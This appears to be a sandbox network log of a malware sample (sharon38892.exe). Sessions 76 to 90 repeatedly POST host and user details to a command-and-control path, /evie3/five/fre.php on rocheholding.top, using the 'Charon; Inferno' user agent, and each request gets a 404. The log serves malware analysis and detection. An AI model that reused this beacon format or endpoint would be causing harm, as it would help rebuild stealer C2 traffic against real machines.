May 23, 2024 20:18:58.415482044 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVZefb0749doZEApEOINIh9TrY%2FmkBT9IWdmUvlIajUgv%2BHMVSFxMznmeNpoAeMr2gcQLSTjZlGhs%2FfzRiiCbM1fclLvPogbiujXSa5IWClAjUX9dTWHusEzDGK64tvbzgy6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d31cf134211-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.22	49240	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:58.594043016 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:58.643681049 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:59.363837957 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=diBRx518e7Jn8mqV%2B1PHrZaBef7EDwU%2B5FQolqDNb7rhNpuHE%2FwxePs%2BBz7KXV8hofRr8R3PI0odntczvv21IQAWEkJBLykPgLEv3to9zJ%2BLXW1%2FXLQXdDDuAgSMQvcHqwbh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d36eded7ce7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.22	49241	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:59.521470070 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:59.571789980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:00.269442081 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mh3Wy2WqvWAUs8KxgOxTtghleeEGlfHUHiBzGw52VEh6j76j0%2B6dH%2BC%2FUELUGy5raJTL00FfP56DLjum16hFm8yr5co8VsNZLetFGhV4KL77pvozlUob494Hy2JSkN05pK6O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d3c9cc9187d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.22	49242	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:00.429820061 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:00.479760885 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:01.175054073 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMU1p337cSbx5Y6Gpjl8wMHUs%2FSBO5Laf1mrGFhKHbnBACpGeNgHF4p36cpcyYkZVpBAj66jyyrb6Wica1kY9TqE2%2F7q0wmFJxuMbyvrbipcbWGQ1%2BEyG9cLN4RKx5aXld7M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d426d8cc3f0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.22	49243	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:01.377448082 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:01.652162075 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:02.025820017 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Syj7tAuEIMCZqN2tRh11O3Qor8fEhbM%2BWRLcGRGnIRVGT%2Bv0yoKw%2Fxj8MOEvjT26tWQB21LO6eUIW5QTLuvRdNJufGAE0QgdZYkk%2FbewBBjKYCuYq1eUfWYTAMVxkjx3hBeT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d483a1e18ae-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.22	49244	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:02.183840990 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:02.235493898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:02.953495026 CEST	633	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpeDZrdwwPO2t5wEyH%2FoZoQYiLedwPvBwIOGgHDPqmSi%2FO%2B5f3uwH5PvEW6iepqHVde6CiC8gJWQXDR%2BtAXF6AWadttYmzYhIsYZnjzP7%2B70g3w9%2FcV6k%2F2%2Fp8vYgzBIDawA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d4d6d7b43cb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.22	49245	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:03.316992998 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:03.367819071 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:04.069135904 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejbrLZuj22CSU29KvxHGoP3%2BIH5mxtwOqh1ESVHkCIZmNpWcMxxa3TgvU%2FWq6OnjuGQqUzMxrH8ctJ5mK1bPvYDwlLekioEqhRp%2BitIzbKttCoyPVgjqtqL%2FovBkRsfVD3sH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d547f0c8c2a-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.22	49246	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:04.226887941 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:04.275613070 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:04.961457014 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRvjDfNJQ2cJf%2BT3f7P2r54lo3pPH52Sb%2FDuJ5xNz1f4iGHhoIVKcZ0R6i2xXIGhSq96IFGo4OWtUNRyy%2FwRc1E%2BJbe9ed0ZxjezMrFYrzRU4oXoOEYco%2B1QCt1D5gdjCplS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d5a0be018b4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.22	49247	188.114.97.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:05.135746956 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:05.183686018 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:05.905803919 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fwyNVCBKJZ8KPcbWAVb3BOUyg7TiHG5aV6%2F80S3fWEl4iXn6%2F4T3k%2Fvp7zywd9bEdIrUrndsqb2MaSrLZ6T5XIhwRMctkj2UqzDk54qZHXD39zRSxKykeSGmUk%2FHrnPX2f%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d5fed4917b5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.22	49248	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:06.064260960 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:06.120733023 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:06.849389076 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02EWFTEVOVtWq0%2BgDUUMiV5Y1CdUN2v9OyKswqt957nxH%2FY02ewrJhb5sa5PR%2BQ0jlrgluETV%2B9BkRjKZyFPhcEImqcyqcu6amCR21waLTfLqXJTvXfQhkbG4RKWN8dIXqsT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d65bc4b7cf0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.22	49249	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:07.020534992 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:07.073698044 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:07.735543013 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pblhBvhklB6b3N3x%2Bs3gf35fzVl2V1YgjxD318mrhyOlBf55l%2Fpj%2FxHCd3mDuZKenXm03EeZhQIMkotOjiVjY%2FKvDNRKhpaMdXmjP5sPb2nZ4NhzUu%2FC6ItME2vG6kAjgCwk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d6b7981187d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.22	49250	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:07.888746023 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:07.942332029 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:08.665510893 CEST	633	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkp7pT%2BacVPDlxbyDnc8SLigsJJV594c4bPNxwwTiAFccsngfJBdYYj1lZ9J%2F6XP1u%2BOG68axa7YRQy2d%2BDq%2Fe8mMZnuTF7nlde9fQw%2BuG9X4dPslkNDFJ4ON0DZGpQ%2F%2F4yz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d712c360cac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.22	49251	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:08.863871098 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:08.907586098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:09.611733913 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4PDKzJMaa126SILTl9o053%2F1HYer3OQOJvXJB4DL67uxL3Pa%2Bl0tP0%2FdLdQ8%2FNvCWFQQA6hbeVozD%2BL1YzHzEdxeQT%2B9cIhLOOzwtVyLMuJoDtNvNIgBT7rsscPATB6KtvA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d76f9c64308-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.22	49252	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:09.943896055 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:09.995471954 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:10.580454111 CEST	617	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GoTdgv9bDZbRWbGXDhVOa8gx6C1AwiFCghPTgmK3bLS58natdXAf4Pn2jX8HnthQQpdpr8fHCEnYNj8KzhotK7VgQJY7qRQFOJXVr2EmT8uR8NvGdWXtOEVcFcBkS4HZTww"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d7dca204204-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.22	49253	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:10.741295099 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:10.804636955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:11.511003971 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhQLDiajpEIC9KtX%2F6HoVEYZTscS4kigoebrkrwjgPDuVwd5IrkLMyC%2B27Q7sFGJWDwIqOP7eintlnBUTvw12P%2Fzt0LL7fFhoaIadID6aoxzpsre9OFHkCTTHnSZ2QA76iom"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d82db9f0f36-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.22	49254	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:11.675766945 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:11.727550030 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
